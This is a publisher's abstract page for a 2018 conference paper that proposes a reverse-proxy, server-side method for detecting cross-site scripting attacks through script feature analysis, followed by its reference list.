Advertisement

XSS Attack Detection Approach Based on Scripts Features Analysis

  • Saoudi Lalia
  • Ammiche Sarah
Conference paper
Part of the Advances in Intelligent Systems and Computing book series (AISC, volume 746)

Abstract

Cross-Site Scripting (XSS) attacks are type of injection problems in modern Web applications that can be exploited by injecting JavaScript code. By now there have been a variety of defensive techniques to protect web application against XSS injection attack, but XSS still cannot be totally detected by injecting benign code of JavaScript: injecting of existing method calls or overriding an existing method definition. Moreover, the present server-side XSS detection systems are based on source code modification of the supervised application. In this project, we developed a server side XSS detection approach based on scripts features analysis, which permits the detection of a wide range of injected scripts: malicious script or legitimate script which is similar to the benign script, without any modification of application source code. Our approach is evaluated on three web applications. The experimental results prove that our approach detects a wide range of XSS attacks.

Keywords

XSS attack Feature extraction Web security Reverse proxy Cross-site scripting 

References

  1. 1.
    Shahriar, H., North, S., Chen, W., Mawangi, E: Design and development of Anti XSS proxy. In: Proceedings of the 8th IEEE International Conference for Internet Technology and Secured Transactions (ICITST), London, UK, 2013, pp. 489–494. ICITST (2013)Google Scholar
  2. 2.
    Shahriar, H., Zulkernine, M.: Injecting comments to detect JavaScript code injection attacks. In: 35th IEEE Annual Computer Software and Applications Conference Workshops, pp. 104–109 (2011)Google Scholar
  3. 3.
    Gupta, S., Gupta, B.B.: XSS-SAFE: a server-side approach to detect and mitigate cross-site scripting (XSS) attacks in JavaScript code. Arabian J. Sci. Eng. 41, 897–920 (2015)CrossRefGoogle Scholar
  4. 4.
    Wurzinger, P., Platzer, C., et al.: SWAP: mitigating XSS attacks using a reverse proxy. In: ICSE Workshop on Software Engineering for Secure Systems, pp. 33–39. IEEE (2009)Google Scholar
  5. 5.
    Stuttard, D., Pinto, M.: The Web Application Hacker’s Handbook Finding and Exploiting Security Flaws. Wiley, Indianapolis (2011)Google Scholar
  6. 6.
    Edgescan: Vulnerability Statistics Report (2015). https://www.edgescan.com/assets/docs/reports/2015-edgescan-Stats-Report-(2015)-v5.pdf. Accessed 30 Nov 2016
  7. 7.
    Website Security Statistics Report (2015). https://info.whitehatsec.com/rs/whitehatsecurity/images/2015-Stats-Report.pdf. Accessed 30 Nov 2016
  8. 8.
    OWASP Top 10 Application Security Risks (2017). https://www.owasp.org/index.php/Top_10_2017-Top_10
  9. 9.
    Twitter users fall victim to new XSS worm. https://news.netcraft.com/archives/2010/09/21/twitter-users-fall-victim-to-new-xss-worm.html. Accessed 12 Dec 2016
  10. 10.
  11. 11.
  12. 12.
    VeriSign Trusted’ shops found to have XSS holes. https://nakedsecurity.sophos.com/2012/02/28/verisign-xss-holes/. Accessed 04 Apr 2017
  13. 13.
    XSS in Google Finance. https://miki.it/blog/2013/7/30/xss-in-google-finance/. Accessed 13 Dec 2016
  14. 14.
    PayPal Site Vulnerable to XSS Attack. threatpost.com/paypal-site-vulnerable-to-xssattack/100787/. Accessed 13 Apr 2017
  15. 15.
    TweetDeck Taken Down To Assess XSS Vulnerability. techcrunch.com/2014/06/11/tweetdeck-fixes-xss-vulnerability. Accessed 04 Apr 2016
  16. 16.
    Microsoft Internet Explorer Universal Cross-Site Scripting Flaw. http://thehackernews.com/2015/02/internet-explorer-xss.html. Accessed 04 Apr 2016
  17. 17.
  18. 18.
    Frenz, C., Yoon, J.: XSSmon: a perl based IDS for the detection of potential XSS attacks. In: IEEE Long Island, pp. 1–4, May 2012Google Scholar
  19. 19.
  20. 20.
    Shahriar, H., Sarah, M., et al.: Information theoretic XSS attack detection in web applications. Int. J. Secure Softw. Eng. 5(3), 1–15 (2014)CrossRefGoogle Scholar
  21. 21.
    Shahriar, H., Sarah, M.: Server-side code injection attack detection based on Kullback-Leibler distance. Int. J. Internet Technol. Secured Trans. 5(3), 240–261 (2014)CrossRefGoogle Scholar

Copyright information

© Springer International Publishing AG, part of Springer Nature 2018

Authors and Affiliations

  1. 1.Computer Science DepartmentMohamed Boudiaf UniversityM′SilaAlgeria

Personalised recommendations